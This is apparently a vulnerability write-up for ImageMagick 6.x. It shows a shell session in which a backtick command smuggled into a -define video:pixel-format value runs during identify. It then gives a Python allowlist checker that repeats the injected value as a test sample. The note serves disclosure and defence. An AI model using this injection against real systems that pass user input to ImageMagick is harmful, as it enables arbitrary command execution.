Notes on checking this against a 6.x version
convert -version
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
ImageMagick 7 and later use the magick command, while the 6.x series uses separate commands such as convert and identify. (That is the only difference from the existing 7.0 issue.)
Linux
Given a normal video file, namely test.mov, the following demonstrates how command injection happens.
/home/test/exp
➜ echo 'deadbeef' > test.txt
/home/test/exp
➜ identify -define video:pixel-format="rgba `cat test.txt > /tmp/leak.txt`" test.mov >info.log
/home/test/exp
➜ tail info.log
test.mov[20] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.030u 0:00.028
test.mov[21] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.030u 0:00.026
test.mov[22] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.030u 0:00.024
test.mov[23] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.022
test.mov[24] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.021
test.mov[25] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.018
test.mov[26] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.017
test.mov[27] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.014
test.mov[28] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.013
test.mov[29] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 33.0075MiB 0.020u 0:00.011
/home/test/exp
➜ cat /tmp/leak.txt
deadbeef
https://github.com/advisories/GHSA-7c5r-cghm-f2jx
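A defensive check for callers that pass user-supplied -define values to identify or convert, added here as an example (not code from the original note or from ImageMagick): it audits an argv list for unsafe -define values and builds an identify command only from an allowlisted pixel format. The two allowlist patterns and the function names audit_defines and build_identify_argv are assumptions, and the generic check on other -define keys goes beyond the video:pixel-format case shown above.

```python
import re

# Assumption: legitimate pixel-format names (rgba, yuv420p, gray16le, ...) use
# only lowercase letters, digits and underscores.
PIXEL_FORMAT_RE = re.compile(r"[a-z0-9_]{1,32}")
# Assumption: conservative allowlist for the value of any other -define key.
GENERIC_VALUE_RE = re.compile(r"[A-Za-z0-9_.,:%+/-]*")


def audit_defines(argv):
    """Return (key, value, reason) for each -define in argv that fails validation."""
    findings = []
    for flag, arg in zip(argv, argv[1:]):
        if flag != "-define":
            continue
        key, _, value = arg.partition("=")
        key = key.strip().lower()
        if key == "video:pixel-format":
            if not PIXEL_FORMAT_RE.fullmatch(value):
                findings.append((key, value, "not a plain pixel-format name"))
        elif not GENERIC_VALUE_RE.fullmatch(value):
            findings.append((key, value, "character outside allowlist"))
    return findings


def build_identify_argv(path, pixel_format):
    """Build the identify argv list, rejecting an unsafe pixel format first."""
    argv = ["identify", "-define", f"video:pixel-format={pixel_format}", path]
    problems = audit_defines(argv)
    if problems:
        raise ValueError(f"rejected -define value: {problems[0][1]!r}")
    return argv


# Constructed samples: argv lists as a process-audit log would record them.
# The first carries the value from the session above.
SAMPLES = [
    ["identify", "-define",
     "video:pixel-format=rgba `cat test.txt > /tmp/leak.txt`", "test.mov"],
    ["identify", "-define", "video:pixel-format=rgba", "test.mov"],
    ["convert", "-define", "jpeg:size=64x64", "in.jpg", "out.png"],
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], audit_defines(sample) or "ok")
```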